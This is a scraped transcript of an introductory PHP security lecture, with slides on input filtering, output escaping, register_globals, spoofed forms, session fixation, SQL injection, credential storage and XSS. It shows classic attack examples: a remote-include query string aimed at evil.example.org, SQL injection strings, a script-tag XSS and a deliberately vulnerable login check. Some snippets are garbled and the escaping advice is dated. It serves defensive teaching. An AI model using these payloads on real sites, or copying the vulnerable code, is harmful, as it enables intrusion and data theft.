Presentation is loading. Please wait.

Presentation is loading. Please wait.

PHP Security.

Published byStephany Fitzgerald Modified over 9 years ago

Similar presentations

Presentation on theme: "PHP Security."— Presentation transcript:

1 PHP Security

2 Two Golden Rules FILTER external input ESCAPE output
Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER ESCAPE output Client browser MYSQL database

3 Two Golden Rules Filter Escape PHP Script Cookie xhtml Forms MYSQL
Referer, etc.

4 Filter example $clean = array(); if (ctype_alnum($_POST['username']))
{ $clean['username'] = $_POST['username']; }

5 Filter example $clean = array(); $clean = array();
if (ctype_alnum($_POST['username'])) { $clean['username'] = $_POST['username']; } $clean = array(); Initialise an array to store filtered data.

6 Filter example $clean = array(); if (ctype_alnum($_POST['username']))
{ $clean['username'] = $_POST['username']; } if (ctype_alnum($_POST['username'])) Inspect username to make sure that it is alphanumeric.

7 Filter example $clean = array(); if (ctype_alnum($_POST['username']))
{ $clean['username'] = $_POST['username']; } $clean['username'] = $_POST['username']; If it is, store it in the array.

8 Escaping Output Process by which you escape characters that have a special meaning on a remote system. Unless you’re sending data somewhere unusual, there is probably a function that does this for you.. The two most common outputs are xhtml to the browser (use htmlentities()) or a MYSQL db (use mysql_real_escape_string()).

9 Escape example $xhtml = array();
$xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo "<p>Welcome back, {$xhtml['username']}.</p>";

10 Escape example $xhtml = array(); $xhtml = array();
$xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo "<p>Welcome back, {$xhtml['username']}.</p>"; $xhtml = array(); Initialize an array for storing escaped data.

11 Escape example $xhtml = array();
$xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo "<p>Welcome back, {$xhtml['username']}.</p>"; $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); Escape the filtered username, and store it in the array.

12 Escape example $xhtml = array();
$xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo "<p>Welcome back, {$xhtml['username']}.</p>"; echo "<p>Welcome back, {$xhtml['username']}.</p>"; Send the filtered and escaped username to the client.

13 Register Globals All superglobal variable array indexes are available as variable names.. e.g. in your scripts: $_POST[‘name’] is available as $name $_COOKIE[‘age’] is available as $age Most PHP installations have this option turned off, but you should make sure your code is secure if it is turned on.

14 Register_globals Poor Security
Login.php <?php if (authenticated_user()) { $authorized = true; } if ($authorized) include “Access.php”; ?> Risk Login.php?authorized=1

15 Register Globals: Example
<?php include "$path/script.php"; ?> If you forget to initialise $path, and have register_globals enabled, the page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following: include ' i.e. a malicious user can include any script in your code..

16 Register Globals: Solution
Be aware that with register globals on, any user can inject a variable of any name into your PHP scripts. ALWAYS EXPLICITLY INITIALISE YOUR OWN VARIABLES!

17 Spoofed Forms Be aware that anybody can write their own forms and submit them to your PHP scripts. For example, using a select, checkbox or radio button form input does not guarantee that the data submitted will be one of your chosen options…

18 Spoofed Forms: Example
The form written by a web developer to be submitted to a page: <form action="/process.php" method="POST"> <select name="colour"> <option value="red">red</option> <option value="green">green</option> <option value="blue">blue</option> </select> <input type="submit" /> </form> The user writes their own form to submit to the same page: <form action=" method="POST"> <input type="text" name="colour" />

19 Spoofed Forms: Solution
Users can submit whatever they like to your PHP page… and it will be accepted as long as it conforms to your rules. Make sure all your rules are checked by the PHP external data filter, don’t rely on a form to exert rules for you.. They can be changed!

20 Session Fixation Session attacks nearly always involve impersonation – the malicious user is trying to ‘steal’ someone else’s session on your site. The crucial bit of information to obtain is the session id, and session fixation is a technique of stealing this id.

21 Session Fixation

22 Session Fixation: Solution
We must regenerate the session identifier whenever there is any change in privilege level (for example, after verifying a username and password) session_regenerate_id()

23 SQL Injection: Example
Consider this query executed in PHP on a MYSQL db, where the text has been submitted from the user: “SELECT * FROM members WHERE = ‘{$_POST[‘ ’]}’”

24 SQL Injection: Example
The use of $_POST[..] in the query should immediately raise warning flags. Consider if a user submitted the following dummy’ OR ‘x’=‘x The query now becomes, SELECT * FROM members WHERE = ‘dummy’ OR ‘x’=‘x’ ..which will return the details of all members!

25 Another Example <?php $query = "SELECT * FROM sometable WHERE field = '" . $_GET[' '] . "';"; ?> What happens if $_GET[' '] is "%" ? SELECT * FROM sometable WHERE field = '%'; What happens if $_GET[' '] is DROP 'sometable" ? SELECT * FROM sometable WHERE field = DROP 'sometable';

26 SQL Injection: Solution
Filter input data. Quote your data. If your database allows it (MySQL does), put single quotes around all values in your SQL statements, regardless of the data type. Escape your data. For a MySQL db, use the function mysql_real_escape_string()

27 Accessing Credentials
Don’t store passwords in an included file without a *.php extension but in a web accessible directory…! You can store in a *.php file under the root (i.e. web accessible). OK, but not great. If your PHP parse engine fails, this data will be on plain view to the entire world. Better, is to keep as much code as possible, including definition of passwords, in included files outside of the web accessible directories. With an Apache server, there are various techniques to include passwords and usernames as environment variables, accessed in PHP by the $_SERVER superglobal. worst best

28 Cross-Site Scripting (XSS)
This is a good example of why you should always escape all output, even for xhtml… echo "<p>Welcome back, {$_GET['username']}.</p>"; echo "<p>Welcome back, <script>...</script>.</p>";

29 XXS: The Solution And again.. Filter input. Escape Output.
Be especially careful if you are writing user input to a file, which is later included into your page.. Without checking, the user can then write their own PHP scripts for inclusion.

30 Review Filter Input + Escape Output = Secure Code

Download ppt "PHP Security."

Similar presentations

Error HandlingPHPMay-2007 : [#] PHP Error Handling.

Error HandlingPHPMay-2007 : [#] PHP Error Handling.
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.

PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
PHP Workshop ‹#› Forms (Getting data from users).

PHP Workshop ‹#› Forms (Getting data from users).
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Secure Software Engineering: Input Vulnerabilities

Secure Software Engineering: Input Vulnerabilities
ITM 352 - © Port, Kazman1 ITM 352 HTML Forms, Basic Form Processing.

ITM © Port, Kazman1 ITM 352 HTML Forms, Basic Form Processing.
Web forms in PHP Forms Recap  Way of allowing user interaction  Allows users to input data that can then be processed by a program / stored in a back-end.

Web forms in PHP Forms Recap  Way of allowing user interaction  Allows users to input data that can then be processed by a program / stored in a back-end.
Lecture 6 – Form processing (Part 1) SFDV3011 – Advanced Web Development 1.

Lecture 6 – Form processing (Part 1) SFDV3011 – Advanced Web Development 1.
Lecture 7 – Form processing (Part 2) SFDV3011 – Advanced Web Development 1.

Lecture 7 – Form processing (Part 2) SFDV3011 – Advanced Web Development 1.
PHP Security Computer Security. overview  Xss, Css  Register_globals  Data Filtering  Sql Injection  Session Fixation.

PHP Security Computer Security. overview  Xss, Css  Register_globals  Data Filtering  Sql Injection  Session Fixation.
CHAPTER 12 COOKIES AND SESSIONS. INTRO HTTP is a stateless technology Each page rendered by a browser is unrelated to other pages – even if they are from.

CHAPTER 12 COOKIES AND SESSIONS. INTRO HTTP is a stateless technology Each page rendered by a browser is unrelated to other pages – even if they are from.
Intro to PHP A brief overview – Patrick Laverty. What is PHP? PHP (recursive acronym for PHP: Hypertext Preprocessor) is a widely-used Open Source general-purpose.

Intro to PHP A brief overview – Patrick Laverty. What is PHP? PHP (recursive acronym for "PHP: Hypertext Preprocessor") is a widely-used Open Source general-purpose.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Similar presentations

Ads by Google